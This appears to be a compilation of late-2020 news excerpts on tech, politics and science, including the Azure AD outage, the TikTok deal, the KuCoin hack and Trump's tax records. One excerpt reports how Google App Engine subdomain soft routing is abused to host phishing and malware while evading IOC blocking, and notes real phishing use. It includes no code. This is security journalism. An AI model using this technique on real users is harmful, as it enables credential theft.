Some Microsoft services, including Outlook, Office 365, and Microsoft Teams, experienced a multi-hour outage on Monday, but the issues have been resolved, according to the company.
“We’ve confirmed that the residual issue has been addressed and the incident has been resolved,” Microsoft tweeted at 12AM ET on Tuesday. “Any users still experiencing impact should be mitigated shortly.”
The company first acknowledged issues at 5:44PM ET via the Microsoft 365 Status Twitter account, and said it had rolled back a change thought to be the cause of the issue at 6:36PM ET. But just 13 minutes later, the company tweeted again to say that it was “not observing an increase in successful connections after rolling back a recent change.” Microsoft tweeted that services were mostly back at 10:20PM ET.
Microsoft’s Azure Active Directory service was also experiencing issues on Monday, but the company said those were “now mitigated” as of 11:21PM ET Monday night. Microsoft said the problems were caused by a configuration change to a backend storage layer, which the company rolled back.
Update, September 29th, 11:20AM ET: Updated to confirm Microsoft has resolved the issues. The headline has also been updated to reflect this fact.
The core service affected was Azure Active Directory, which controls login to everything from Outlook email to Teams to the Azure portal, used for managing other cloud services. The five-hour impact was also felt in productivity-stopping annoyances like some installations of Microsoft Office and Visual Studio, even on the desktop, declaring that they could not check their licensing and therefore would not run.
There are claims that the US emergency 911 service was affected, which is not implausible given that the RapidDeploy Nimbus Dispatch systemdescribes itself as “a Microsoft Azure–based Computer Aided Dispatch platform”. If the problem is authentication, even resilient services with failover to other Azure regions may become inaccessible and therefore useless.
The company has yet to provide full details, but a status report today said that “a recent configuration change impacted a backend storage layer, which caused latency to authentication requests”.
[…]
Microsoft seems to have more than its fair share of problems. Gartner noted recently that it “continues to have concerns related to the overall architecture and implementation of Azure, despite resilience-focused efforts and improved service availability metrics during the past year”. The analyst’s reservations were based in part on the low ratio of availability zones to regions, and that “a limited set of services support the availability zone model”.
Gartner’s concerns are valid, but this was not the cause of the recent disruption. Bill Witten, identity architect at Okta, was to the point, commenting: “So, does everyone get why the mono-directory is not a good idea?”
Microsoft has built so much on Azure Active Directory that it is a single point of failure. The company either needs to make it so resilient that failure is near-impossible (which is likely to be its intention), or consider gradually reducing the dependence of so many services.
Source:
With so many cloud services dependent on it, Azure Active Directory has become a single point of failure for Microsoft
To hear many politicians (and, tragically, many academics) tell the story, patents and patent policy are keys to innovation. Indeed, many studies trying to measure innovation use the number of patents as a proxy. For years, we’ve argued that there is little evidence that patents are in any way correlated with innovation. Indeed, in practice, we often see patents get in the way of innovation, rather than being a sign of innovation. If anything, an influx of patents seems to indicate a decline in innovation, because as the saying goes, smart companies innovate, while failed companies litigate. Litigating patents tends to happen when a more established company no longer is able to compete by innovation, and has to bring in the courts to block and stop more nimble competitors.
Indeed, over and over again we seem to see the most innovative companies eschewing the anti-competitive powers that patents give them. I was reminded of this recently with the announcement that payments company Square had agreed to put all of its crypto patents into a new non-profit called the Crypto Open Patent Alliance to help fight off the unfortunate number of crypto patent trolls that are showing up.
Square is putting all of our crypto patents into a new non-profit org we’re calling the Crypto Open Patent Alliance, which will maintain a shared patent library to help the crypto community defend against patent aggressors and trolls. Join us! #bitcoinhttps://t.co/I9VopgtMz9
Of course, we see this throughout the companies generally considered to be the most innovative. A decade ago, Twitter came up with a very clever Innovator’s Patent Agreement, which effectively would block patent trolls from ever being able to use Twitter’s patents, should they somehow fall into trollish hands. A bunch of other top internet companies including Google, Dropbox, Asana, and Newegg launched the License on Transfer network, as a basic poison pill to, again, stop patent trolls.
And, most famously, Elon Musk flat out gave away Tesla’s patents and encouraged anyone else to use them to compete with Tesla, license-free.
If patents really were so vital to innovation, why would all of these innovative companies be so quick to give them up? And why is it so incredibly rare that any of them assert patents against competitors? Instead, so much of the patent litigation we see is against those innovative companies coming from a variety of patent trolls (frequently lawyers who never innovated at all) or also ran companies which may have been innovative in the past but have long since seen their innovative days in the rearview mirror.
It would be nice if policymakers, the media, and academics finally started recognizing the idea that patents are not just a bad proxy for actual innovation, but often antithetical to innovation, and we can see all the evidence we need for that in the fact that the most innovative companies are “devaluing” in their own patents to improve the ecosystem, rather than enforce those patents.
Not only that, but there are whole industries that would be nowhere if patents were enforced rigidly, such as the fashion industry and computer programming.
Tax records obtained by The New York Times appear to show that President Trump reduced his taxable income by treating his eldest daughter, Ivanka Trump, as a consultant, then deducting this as a business expense.
The Times reports that Trump Organization tax records show between 2010 and 2018, President Trump wrote off as business expenses $26 million in “consulting fees.” The consultants are not listed by name, but the Times compared the tax records to financial disclosures Ivanka Trump filed when she started working at the White House in 2017 as a senior adviser to her father. Ivanka Trump reported receiving $747,622 in payments from a consulting company she co-owned — the same exact amount in consulting fees the Trump Organization claimed as tax deductions for hotel projects in Hawaii and Vancouver.
As an executive officer with the Trump Organization, Ivanka Trump managed the Hawaii and Vancouver hotel projects, “meaning she appears to have been treated as a consultant on the same hotel deals that she helped manage as part of her job at her father’s business,” the Times said. Ivanka Trump earned a salary of about $480,000 while serving as an executive with the Trump Organization, and the amount jumped up to $2 million after her father became president, the Times reports; since leaving to work in the White House, she has not received a salary from the company.
The tax filings also show that Trump collected $5 million for a hotel deal in Azerbaijan and reported $1.1 million in consulting fees and made $3 million in Dubai while reporting a $630,000 consulting fee. People with direct knowledge of the deals told the Times they were not aware of any consultants or third parties who would have been paid in connection with the projects.
We’ve already covered what a ridiculous, pathetic grift the Oracle/TikTok deal was. Despite it being premised on a “national security threat” from China, because the app might share some data (all of which is easily buyable from data brokers) with Chinese officials, the final deal cured none of that, left the Chinese firm ByteDance with 80% ownership of TikTok, and gave Trump supporters at Oracle a fat contract — and allowed Trump to pretend he did something.
Of course, what he really did was hand China a huge gift. In response to the deal, state media in China is now highlighting how the Chinese government can use this deal as a model for the Chinese to force the restructuring of US tech companies, and force the data to be controlled by local companies in China. This is from the editor-in-chief of The Global Times, a Chinese, state-sponsored newspaper:
That says:
The US restructuring of TikTok’s stake and actual control should be used as a model and promoted globally. Overseas operation of companies such as Google, Facebook shall all undergo such restructure and be under actual control of local companies for security concerns.
So, beyond doing absolutely nothing to solve the “problem” that politicians in the US laid out, the deal works in reverse. It’s given justification for China to mess with American companies in the same way, and push to expose more data to the Chinese government.
Great work, Trump. Hell of a deal.
Meanwhile, the same Twitter feed says that it’s expected that officials in Beijing are going to reject the deal from their end, and seek to negotiate one even more favorable to China’s “national security interests and dignity.”
So, beyond everything else, Trump’s “deal” has probably done more to help China, and harm data privacy and protection, while also handing China a justification playbook to do so: “See, we’re just following your lead!”
The Seychelles-based outfit, founded in 2017, proudly boasts of its venture capital backers who clearly admire its services facilitating trading of “numerous digital assets and cryptocurrencies”. And on Saturday it advised users that it “detected some large withdrawals since September 26, 2020 at 03:05:37 (UTC+8)” and that an internal security audit revealed “part of Bitcoin, ERC-20 and other tokens in KuCoin’s hot wallets were transferred out of the exchange, which contained few parts of our total assets holdings. The assets in our cold wallets are safe and unharmed, and hot wallets have been re-deployed.”
The company also promised that any losses would be covered by insurance, but also advised that deposit and withdrawal services would be suspended pending a security review.
A later update included an FAQ in which customers asked why some of the withdrawals continued even after the first incident notification was posted. KuCoin assured customers it conducted those transactions itself and advised that restoration of withdrawal functions could take a week. In the volatile world of cryptocurrency, a week can be the difference between a win and a bust.
A Monday update, the latest, revealed the scale of the hack as KuCoin identified over $130m of assets. It also describes work among a number of crypto players to identify suspicious transactions, freeze transactions, and even lists some addresses suspected of involvement in the heist.
“KuCoin has been in touch with a growing number of industry partners to take tangible actions, thanks to all of you for your support!,” the statement concluded.
However, the latest statement does not offer any further information on the cause of the incident, remediation steps, or restoration times.
So there you have it, dear reader: a venture-backed startup, based in a tax haven, demonstrating the future of money in all its glory.
And in the background, China deciding that its own digital currency will be run only by its biggest banks with new payment players like Alibaba not allowed anywhere near its innermost workings
Transistors based on carbon rather than silicon could potentially boost computers’ speed and cut their power consumption more than a thousandfold — think of a mobile phone that holds its charge for months — but the set of tools needed to build working carbon circuits has remained incomplete until now.
A team of chemists and physicists at the University of California, Berkeley, has finally created the last tool in the toolbox, a metallic wire made entirely of carbon, setting the stage for a ramp-up in research to build carbon-based transistors and, ultimately, computers.
“Staying within the same material, within the realm of carbon-based materials, is what brings this technology together now,” said Felix Fischer, UC Berkeley professor of chemistry, noting that the ability to make all circuit elements from the same material makes fabrication easier. “That has been one of the key things that has been missing in the big picture of an all-carbon-based integrated circuit architecture.”
[…]
“Nanoribbons allow us to chemically access a wide range of structures using bottom-up fabrication, something not yet possible with nanotubes,” Crommie said. “This has allowed us to basically stitch electrons together to create a metallic nanoribbon, something not done before. This is one of the grand challenges in the area of graphene nanoribbon technology and why we are so excited about it.”
Metallic graphene nanoribbons — which feature a wide, partially-filled electronic band characteristic of metals — should be comparable in conductance to 2D graphene itself.
“We think that the metallic wires are really a breakthrough; it is the first time that we can intentionally create an ultra-narrow metallic conductor — a good, intrinsic conductor — out of carbon-based materials, without the need for external doping,” Fischer added.
Crommie, Fischer and their colleagues at UC Berkeley and Lawrence Berkeley National Laboratory (Berkeley Lab) will publish their findings in the Sept. 25 issue of the journal Science.
[…]
Several years ago, Fischer and Crommie teamed up with theoretical materials scientist Steven Louie, a UC Berkeley professor of physics, to discover new ways of connecting small lengths of nanoribbon to reliably create the full gamut of conducting properties.
Two years ago, the team demonstrated that by connecting short segments of nanoribbon in the right way, electrons in each segment could be arranged to create a new topological state — a special quantum wave function — leading to tunable semiconducting properties.
In the new work, they use a similar technique to stitch together short segments of nanoribbons to create a conducting metal wire tens of nanometers long and barely a nanometer wide.
The nanoribbons were created chemically and imaged on very flat surfaces using a scanning tunneling microscope. Simple heat was used to induce the molecules to chemically react and join together in just the right way. Fischer compares the assembly of daisy-chained building blocks to a set of Legos, but Legos designed to fit at the atomic scale.
“They are all precisely engineered so that there is only one way they can fit together. It’s as if you take a bag of Legos, and you shake it, and out comes a fully assembled car,” he said. “That is the magic of controlling the self-assembly with chemistry.”
Once assembled, the new nanoribbon’s electronic state was a metal — just as Louie predicted — with each segment contributing a single conducting electron.
The final breakthrough can be attributed to a minute change in the nanoribbon structure.
“Using chemistry, we created a tiny change, a change in just one chemical bond per about every 100 atoms, but which increased the metallicity of the nanoribbon by a factor of 20, and that is important, from a practical point of view, to make this a good metal,” Crommie said.
The two researchers are working with electrical engineers at UC Berkeley to assemble their toolbox of semiconducting, insulating and metallic graphene nanoribbons into working transistors.
“I believe this technology will revolutionize how we build integrated circuits in the future,” Fischer said. “It should take us a big step up from the best performance that can be expected from silicon right now. We now have a path to access faster switching speeds at much lower power consumption. That is what is driving the push toward a carbon-based electronics semiconductor industry in the future.”
President Donald Trump paid just $750 in federal income taxes the year he ran for president and in his first year in the White House, according to a report Sunday in The New York Times.
Trump, who has fiercely guarded his tax filings and is the only president in modern times not to make them public, paid no federal income taxes in 10 of the past 15 years.
The details of the tax filings complicate Trump’s description of himself as a shrewd and patriotic businessman, revealing instead a series of financial losses and income from abroad that could come into conflict with his responsibilities as president. The president’s financial disclosures indicated he earned at least $434.9 million in 2018, but the tax filings reported a $47.4 million loss.
The tax filings also illustrate how a reputed billionaire could pay little to nothing in taxes, while someone in the middle class could pay substantially more than him. Nearly half of Americans pay no income taxes, primarily because of how their low incomes are. But IRS figures indicate that the average tax filer paid roughly $12,200 in 2017, about 16 times more than what the president paid.
The disclosure, which the Times said comes from tax return data it obtained extending over two decades, comes at a pivotal moment ahead of the first presidential debate Tuesday and weeks before a divisive election against Democrat Joe Biden.
Speaking at a news conference Sunday at the White House, Trump dismissed the report as “fake news” and maintained he has paid taxes, though he gave no specifics. He also vowed that information about his taxes “will all be revealed,” but he offered no timeline for the disclosure and made similar promises during the 2016 campaign on which he never followed through.
In fact, the president has fielded court challenges against those seeking access to his returns, including the U.S. House, which is suing for access to Trump’s tax returns as part of congressional oversight.
During his first two years as president, Trump received $73 million from foreign operations, which in addition to his golf properties in Scotland and Ireland included $3 million from the Philippines, $2.3 million from India and $1 million from Turkey, among other nations. The president in 2017 paid $145,400 in taxes in India and $156,824 in the Philippines, compared to just $750 in U.S. income taxes. The Times said the tax records did not reveal any unreported connections to Russia.
Trump found multiple ways to reduce his tax bills. He has taken tax deductions on personal expenses such as housing, aircraft and $70,000 to style his hair while he filmed “The Apprentice.” Losses in the property businesses solely owned and managed by Trump appear to have offset income from his stake in “The Apprentice” and other entities with multiple owners.
During the first two years of his presidency, Trump relied on business tax credits to reduce his tax obligations. The Times said $9.7 million worth of business investment credits that were submitted after Trump requested an extension to file his taxes allowed him to reduce his income and pay just $750 each in 2016 and 2017.
Income tax payments help finance the military and domestic programs.
Trump, starting in 2010, claimed and received an income tax refund that totaled $72.9 million, which the Times said was at the core of an ongoing audit by the IRS. The Times said a ruling against Trump could cost him $100 million or more. He also has more than $300 million in loans due to be repaid in the next four years.
Richard Neal, D-Mass., the chair of the House Ways and Means Committee who has tried unsuccessfully to obtain Trump’s tax records, said the Times report makes it even more essential for his committee to get the documents.
“It appears that the President has gamed the tax code to his advantage and used legal fights to delay or avoid paying what he owes,” Neal wrote in a statement. “Now, Donald Trump is the boss of the agency he considers an adversary. It is essential that the IRS’s presidential audit program remain free of interference.”
A lawyer for the Trump Organization, Alan Garten, and a spokesperson for the Trump Organization did not immediately respond to a request for comment from The Associated Press on the report.
Garten told the Times that “most, if not all, of the facts appear to be inaccurate.”
He said in a statement to the news organization that the president “has paid tens of millions of dollars in personal taxes to the federal government, including paying millions in personal taxes since announcing his candidacy in 2015.”
The New York Times said it declined to provide Garten with the tax filings in order to protect its sources, but it said its sources had legal access to the records.
During his first general election debate against Democrat Hillary Clinton in 2016, Clinton said that perhaps Trump wasn’t releasing his tax returns because he had paid nothing in federal taxes.
Trump interrupted her to say, “That makes me smart.”
A judge in Washington has temporarily blocked a Trump administration order banning Apple and Google from offering Chinese-owned app TikTok for download that was set to take effect at 11:59pm on Sunday.
US district judge Carl Nichols granted a preliminary injunction sought by TikTok’s owner, ByteDance, to allow the app to remain available at US app stores, but declined “at this time” to block additional commerce department restrictions that are set to take effect on 12 November that TikTok has said would have the impact of making the app impossible to use in the United States.
Nichols’ detailed written opinion is expected to be released as soon as Monday.
The Commerce Department said in a statement it “will comply with the injunction and has taken immediate steps to do so.” The statement, which defended the TikTok order and Trump’s executive order demanding owner ByteDance divest its TikTok US operations within 90 days, did not specify whether the government would appeal.
TikTok said it was pleased with the injunction and added it “will also maintain our ongoing dialogue with the government to turn our proposal, which the president gave his preliminary approval to last week, into an agreement.”
The company’s lawyer John Hall had said a ban would be “punitive” and close off a public forum used by tens of millions of Americans.
In a written brief filed ahead of the hearing, TikTok lawyers said the ban was “arbitrary and capricious” and “would undermine data security” by blocking updates and fixes to the app used by some 100 million Americans.
The company also said the ban was unnecessary because negotiations were already underway to restructure the ownership of TikTok to address national security issues raised by the administration.
TikTok has an estimated 100 million users in the US and 700 million worldwide, making it one of the largest operators in the social media space.
Government lawyers argued the president had a right to take national security actions, and said the ban was needed because of TikTok’s links to the Chinese government through its parent firm ByteDance.
A government brief called ByteDance “a mouthpiece” for the Chinese Communist Party and said it was “committed to promoting the CCP’s agenda and messaging.”
ByteDance said on 20 September it had struck a preliminary deal for Walmart Inc and Oracle Corp to take stakes in a new company, TikTok Global, that would oversee US operations after Trump said he had given the deal his “blessing.” Negotiations continue over the terms of the agreement and to resolve concerns from Washington and Beijing.
The deal is still to be reviewed by the US government’s Committee on Foreign Investment in the United States (CFIUS).
A newly discovered technique by a researcher shows how Google’s App Engine domains can be abused to deliver phishing and malware while remaining undetected by leading enterprise security products.
Google App Engine is a cloud-based service platform for developing and hosting web apps on Google’s servers.
While reports of phishing campaigns leveraging enterprise cloud domains are nothing new, what makes Google App Engine infrastructure risky in how the subdomains get generated and paths are routed.
Practically unlimited subdomains for one app
Typically scammers use cloud services to create a malicious app that gets assigned a subdomain. They then host phishing pages there. Or they may use the app as a command-and-control (C2) server to deliver malware payload.
But the URL structures are usually generated in a manner that makes them easy to monitor and block using enterprise security products, should there be a need.
For example, a malicious app hosted on Microsoft Azure services may have a URL structure like: https://example-subdomain.app123.web.core.windows.net/…
Therefore, a cybersecurity professional could block traffic to and from this particular app by simply blocking requests to and from this subdomain. This wouldn’t prevent communication with the rest of the Microsoft Azure apps that use other subdomains.
It gets a bit more complicated, however, in the case of Google App Engine.
Security researcher Marcel Afrahim demonstrated an intended design of Google App Engine’s subdomain generator, which can be abused to use the app infrastructure for malicious purposes, all while remaining undetected.
Google’s appspot.com domain, which hosts apps, has the following URL structure:
A subdomain, in this case, does not only represent an app, it represents an app’s version, the service name, project ID, and region ID fields.
But the most important point to note here is, if any of those fields are incorrect, Google App Engine won’t show a 404 Not Found page, but instead show the app’s “default” page (a concept referred to as soft routing).
“Requests are received by any version that is configured for traffic in the targeted service. If the service that you are targeting does not exist, the request gets Soft Routed,” states Afrahim, adding:
“If a request matches the PROJECT_ID.REGION_ID.r.appspot.com portion of the hostname, but includes a service, version, or instance name that does not exist, then the request is routed to the default service, which is essentially your default hostname of the app.”
Essentially, this means there are a lot of permutations of subdomains to get to the attacker’s malicious app. As long as every subdomain has a valid “project_ID” field, invalid variations of other fields can be used at the attacker’s discretion to generate a long list of subdomains, which all lead to the same app.
For example, as shown by Afrahim, both URLs below – which look drastically different, represent the same app hosted on Google App Engine.
“Verified by Google Trust Services” means trusted by everyone
The fact that a single malicious app is now represented by multiple permutations of its subdomains makes it hard for sysadmins and security professionals to block malicious activity.
But further, to a technologically unsavvy user, all of these subdomains would appear to be a “secure site.” After all, the appspot.com domain and all its subdomains come with the seal of “Google Trust Services” in their SSL certificates.
Google App Engine sites showing valid SSL certificate with “Verified by: Google Trust Services” text
Source: Afrahim
Even further, most enterprise security solutions such as Symantec WebPulse web filter automatically allow traffic to trusted category sites. And Google’s appspot.com domain, due to its reputation and legitimate corporate use cases, earns an “Office/Business Applications” tag, skipping the scrutiny of web proxies.
Automatically trusted by most enterprise security solutions
On top, a large number of subdomain variations renders the blocking approach based on Indicators of Compromise (IOCs) useless.
A screenshot of a test app created by Afrahim along with a detailed “how-to” demonstrates this behavior in action.
In the past, Cloudflare domain generation had a similar design flaw that Astaroth malware would exploit via the following command wheen fetching stage 2 payload:
This would essentially launch a Windows command prompt and put a random number replacing %RANDOM% making the payload URL truly dynamic.
“And now you have a script that downloads the payload from different URL hostnames each time is run and would render the network IOC of such hypothetical sample absolutely useless. The solutions that rely on single run on a sandbox to obtain automated IOC would therefore get a new Network IOC and potentially new file IOC if script is modified just a bit,” said the researcher.
Delivering malware via Google App Engine subdomain variations while bypassing IOC blocks
Actively exploited for phishing attacks
Security engineer and pentester Yusuke Osumi tweeted last week how a Microsoft phishing page hosted on the appspot.com subdomain was exploiting the design flaw Afrahim has detailed.
Osumi additionally compiled a list of over 2,000 subdomains generated dynamically by the phishing app—all of them leading to the same phishing page.
Active exploitation of Google App Engine subdomains in phishing attacks
Source: Twitter
This recent example has shifted the focus of discussion from how Google App Engine’s flaw can be potentially exploited to active phishing campaigns leveraging the design flaw in the wild.
“Use a Google Drive/Service phishing kit on Google’s App Engine and normal user would not just realize it is not Google which is asking for credentials,” concluded Afrahim in his blog post.
Formula 1 drivers have been told they cannot wear clothing bearing any slogans or messages while doing official duties after grands prix.
The move is a reaction to Mercedes’ Lewis Hamilton wearing a T-shirt at the last race in Tuscany referencing the case of a woman killed by US police.
The FIA said podium finishers “must remain attired only in their driving suits done up to the neck”.
This must be the case throughout the podium ceremony and interviews.
The requirements include a “medical face mask or team-branded face mask”.
The move had been expected after talks between the FIA, Mercedes and Hamilton’s representatives before this weekend’s Russian Grand Prix.
At Mugello, Hamilton wore a T-shirt saying: “Arrest the cops who killed Breonna Taylor” at the official pre-race anti-racism demonstration and on the podium and during the post-race interviews.
He had previously worn a Black Lives Matter T-shirt for the demonstration, but not after the race, while other drivers wore the FIA official “End Racism” T-shirts.
The FIA looked into whether they should investigate Hamilton on the grounds of breaking any rules, but decided against it.
Political messages have long been banned on the podium in F1.
Hamilton said at the Russian Grand Prix: “I did something that has never really happened in F1 and obviously they will stop it from happening moving forwards.”
Future moon explorers will be bombarded with two to three times more radiation than astronauts aboard the International Space Station, a health hazard that will require thick-walled shelters for protection, scientists reported Friday.
China’s lander on the far side of the moon is providing the first full measurements of radiation exposure from the lunar surface, vital information for NASA and others aiming to send astronauts to the moon, the study noted.
[…]
Astronauts would get 200 to 1,000 times more radiation on the moon than what we experience on Earth—or five to 10 times more than passengers on a trans-Atlantic airline flight, noted Robert Wimmer-Schweingruber of Christian-Albrechts University in Kiel, Germany.
“The difference is, however, that we’re not on such a flight for as long as astronauts would be when they’re exploring the moon,” Wimmer-Schweingruber said in an email.
Cancer is the primary risk.
“Humans are not really made for these radiation levels and should protect themselves when on the moon,” he added.
[…]
Wimmer-Schweingruber said the radiation levels are close to what models had predicted. The levels measured by Chang’e 4, in fact, “agree nearly exactly” with measurements by a detector on a NASA orbiter that has been circling the moon for more than a decade, said Kerry Lee, a space radiation expert at Johnson Space Center in Houston.
“It is nice to see confirmation of what we think and our understanding of how radiation interacts with the moon is as expected,” said Lee, who was not involved in the Chinese-led study.
[…]
The German researchers suggest shelters built of moon dirt—readily available material—for stays of more than a few days. The walls should be 80 centimeters (about 2 1/2 feet) thick, they said. Any thicker and the dirt will emit its own secondary radiation, created when galactic cosmic rays interact with the lunar soil.
The September 20 deadline for a purported TikTok sale has already passed, but the parties involved have yet to settle terms on the deal. ByteDance and TikTok’s bidders Oracle and Walmart presented conflicting messages on the future ownership of the app, confusing investors and users. Meanwhile, Beijing’s discontent with the TikTok sale is increasingly obvious.
China has no reason to approve the “dirty” and “unfair” deal that allows Oracle and Walmart to effectively take over TikTok based on “bullying and extortion,” slammed an editorial published Wednesday in China Daily, an official English-language newspaper of the Chinese Communist Party.
The editorial argued that TikTok’s success — a projected revenue of about a billion dollars by the end of 2020 — “has apparently made Washington feel uneasy” and prompted the U.S. to use “national security as the pretext to ban the short video sharing app.”
The official message might stir mixed feelings within ByteDance, which has along the way tried to prove its disassociation from the Chinese authority, a precondition for the companies’ products to operate freely in Western countries.
Beijing has already modified a set of export rules to complicate the potential TikTok deal, restricting the sale of certain AI-technologies to foreign companies. Both ByteDance and China’s state media have said the agreement won’t involve technological transfers.
The Trump administration said it would ban downloads of TikTok, which boasts 100 million users in the country, if an acceptable deal was not reached. It also planned to shut down Tencent’s WeChat, a decision that just got blocked by a district court in San Francisco.
TikTok has collected nearly 198 million App Store and Google Play installs in the U.S., while WeChat has been installed by nearly 22 million users in the U.S. since 2014, according to market research firm Sensor Tower. Unlike TikTok, which has a far-reaching user base in the U.S., WeChat is mainly used by Chinese-speaking communities or those with connections in China, where the messenger is the dominant chat app and most Western alternatives are blocked.
Four of the seven former eBay employees charged with cyberstalking a couple critical of the web auction house are scheduled to plead guilty next month.
In June, the US Justice Department charged six former staffers – director of safety and security James Baugh, 45, of San Jose, California; director of global resiliency David Harville, 48, of New York City; manager of global intelligence Stephanie Stockwell, 26, of Redwood City, California; and eBay Global Intelligence Center staffers Stephanie Popp, 32, Veronica Zea, 26, and Brian Gilbert, 51, all of San Jose – with conspiring to commit cyberstalking and tamper with witnesses.
The US Attorney’s Office of Massachusetts on Wednesday said four former eBay employees charged in that case plan to admit guilt at a video conference hearing scheduled for October 8, 2020.
A spokesperson for the USAO of Massachusetts confirmed to The Register the four individuals are Brian Gilbert, Stephanie Popp, Stephanie Stockwell, and Veronica Zea. The cases against the two most senior executives in the group, Harville and Baugh, remain ongoing; both deny the accusations.
In July, a seventh former eBay employee, former Santa Clara police captain Philip Cooke, 55, who oversaw security operations at eBay’s offices in Europe and Asia, was charged separately for alleged involvement in the harassment campaign.
The defendants are said [PDF] to have participated in a concerted effort to intimidate and silence a husband and wife team who run an ecommerce-focused newsletter and blog in a campaign last year.
[…]
it describes a harassment effort that consisted, among other things, of sending the newsletter publishers live cockroaches, the head of a fetal pig, a funeral wreath, a mask of a bloody pig’s head, and a book on surviving the loss of a spouse.
Unasked
Bloomberg suggests the recipient of that text message, “Executive 1,” is former CEO David Wenig, based on the similarity between a newsletter article quoted in the complaint, “eBay RICO Lawsuit Meant to Curb Seller Exodus to Amazon?” and an article with the same headline on the EcommerceBytes Blog that refers to Wenig.
The affidavit outlining the case cites text identical to the online article except that it replaces “eBay CEO” with “[Executive 1]”. Wenig has not been charged with any wrongdoing.
Subscriptions may be ideal for certain services such as Netflix, with its constant flow of new content, but for a suite of tools like Microsoft Office? Paying every month doesn’t suit everyone, especially if all they want is access to the word processor and spreadsheet. Thankfully, a new perpetual license edition of the suite arrives next year.
Microsoft clearly pushes an Office subscription as the best way to access its always up-to-date suite of tools and services, while those who just want to buy a copy outright and use it for years to come are still using Office 2019, which released back in 2018. It was unclear whether 2019 would ever be replaced, but as spotted by Windows Central, Microsoft quietly confirmed in a news post by the Exchange team that “Microsoft Office will also see a new perpetual release for both Windows and Mac, in the second half of 2021.”
There’s no details regarding the name, price, or availability of this new version
Spain’s highways agency is using bulk mobile phone data for monitoring speeding hotspots, according to local reports.
Equipped with data on customers handed over by local mobile phone operators, Spain’s Directorate-General for Traffic (DGT) may be gathering data on “which roads and at what specific kilometer points the speed limits are usually exceeded,” according to Granadan newspaper Ideal (en español).
“In fact, Traffic has data on this since the end of last year when the National Statistics Institution (INE) reached an agreement with mobile operators to obtain information about the movements of citizens,” reported the paper.
The data-harvesting agreement was first signed late last year to coincide with a national census (as El Reg reported at the time) and is now being used to monitor drivers’ speeds.
National newspaper El Paisreported in October 2019 that the trial would involve dividing Spain “into 3,500 cells with a minimum of 5,000 people in each of them” with the locations of phones being sampled continuously between 9am and 6pm, with further location snapshots being taken at 12am and 6am.
The newspaper explained: “With this information it will be possible to know how many citizens move from a dormitory municipality to a city; how many people work in the same neighbourhood where you live or in a different one; where do the people who work in an area come from, or how the population fluctuates in a box throughout the day.”
The INE insisted that data collected back then had been anonymised and was “aimed at getting a better idea of where Spaniards go during the day and night”, as the BBC summarised the scheme. Mobile networks Vodafone, Movistar, and Orange were all said to be handing over user data to the INE, with the bulk information fetching €500,000 – a sum split between all three firms.
In April the initiative was reactivated for the so-called DataCovid plan, where the same type of bulk location data was used to identify areas where Spaniards were ignoring COVID-19 lockdown laws.
“The goal is to analyse the effect which the (confinement) measures have had on people’s movements, and see if people’s movements across the land are increasing or decreasing,” Spain’s government said at the time, as reported by expat news service The Local’s Iberian offshoot.
The DGT then apparently hit on the idea of using speed data derived from cell tower pings (in the same way that Google Maps, Waze, and other online services derive average road speed and congestion information) to identify locations where drivers may have been breaking the speed limit.
The Ideal news website seemed to put the obvious fears to bed in its report of the traffic police initiative when it posed the obvious, rhetorical, question: whether drivers can be fined based on mobile data.
“The answer is clear and direct: it is not possible,” it concluded. “The DGT can only fine us through the fixed and mobile radars that it has installed throughout the country.”
While the direction of travel here seems obvious to anyone with any experience of living in a western country that implements this type of dragnet mass surveillance, so far there is little evidence of an explicit link between mobile phone data-slurping and speed cameras or fines.
Back in 2016, TfL ran a “trial” tracking people’s movements by analysing where their MAC addresses popped up within the Tube network, also hoping to use this data to get higher prices for advertising spots at busy areas inside Tube stations. Dedicated public Wi-Fi spots on train platforms is now a permanent fixture in all but a few of the London Underground stations. The service is operated by Virgin Media, which is “free” to use by customers of the four mobile network operators, but collects your mobile number at the point of signing up.
And here you can see the ease with which mission creep comes out and people start using your data for all kinds of non-related things once they have it. This is why we shouldn’t allow governments or anyone else to get their grubby little hands on it and why we should be glad that at least at EU level, data privacy is taken seriously with GDPR and other laws.
Twitter is notifying developers today about a possible security incident that may have impacted their accounts.
The incident was caused by incorrect instructions that the developer.twitter.com website sent to users’ browsers.
The developer.twitter.com website is the portal where developers manage their Twitter apps and attached API keys, but also the access token and secret key for their Twitter account.
In an email sent to developers today, Twitter said that its developer.twitter.com website told browsers to create and store copies of the API keys, account access token, and account secret inside their cache, a section of the browser where data is saved to speed up the process of loading the page when the user accessed the same site again.
This might not be a problem for developers using their own browsers, but Twitter is warning developers who may have used public or shared computers to access the developer.twitter.com website — in which case, their API keys are now most likely stored in those browsers.
“If someone who used the same computer after you in that temporary timeframe knew how to access a browser’s cache, and knew what to look for, it is possible they could have accessed the keys and tokens that you viewed,” Twitter said.
“Depending on what pages you visited and what information you looked at, this could have included your app’s consumer API keys, as well as the user access token and secret for your own Twitter account,” Twitter said.
Facebook has temporarily shamed Apple out of taking a 30 percent cut of paid online events organized by small businesses and hosted on Facebook—things like cooking classes, workout sessions, and happy hours. Demand for these kinds of online events has soared during the COVID-19 pandemic.
Apple says that it has a longstanding policy that digital products must be purchased using Apple’s in-app payments system—and hence pay Apple’s 30 percent tax. In contrast, companies selling physical goods and services are not only allowed but required to use other payment methods (options here include Apple Pay, which doesn’t take such a big cut).
For example, an in-person cooking class is not a digital product, so a business selling cooking class tickets via an iPhone app wouldn’t have to give Apple a 30 percent cut. But if the same business offers a virtual cooking class, Apple considers that to be a digital product and demands a 30 percent cut—at least if the customer pays for the class using an iOS device.
Last month, Facebook announced it would start offering a new feature for small businesses to host paid online events. Facebook has waived any fees for the first year, allowing small businesses to pocket 100 percent of the revenue. But Apple refused to budge on its 30 percent take.
The issue came to a head in late August when Facebook revealed that Apple wouldn’t even allow Facebook to inform users about Apple’s 30 percent take. Facebook wanted to have a message on the checkout screen that said “Apple takes 30 percent of this purchase.” But Apple deemed this message “irrelevant” and forced Facebook to remove it before approving Facebook’s update.
The reprieve is only temporary. Apple says it has given Facebook until the end of the year to switch from Facebook Pay to in-app purchases—and hence start paying Apple 30 percent—for online events. Apple is extending the same courtesy to Airbnb and ClassPass.
However, this grace period isn’t available for Gaming Creators, which Apple argues are not brick-and-mortar businesses that have been affected by COVID-19.
If you’ve been experiencing issues trying to access Google or YouTube, you’re not alone. Around 9 p.m. ET on Thursday evening, tons of users worldwide reported problems with Google and the many services under the tech giant’s umbrella, including Google Drive, Gmail, Stadia, the Play Store, and even Nest.
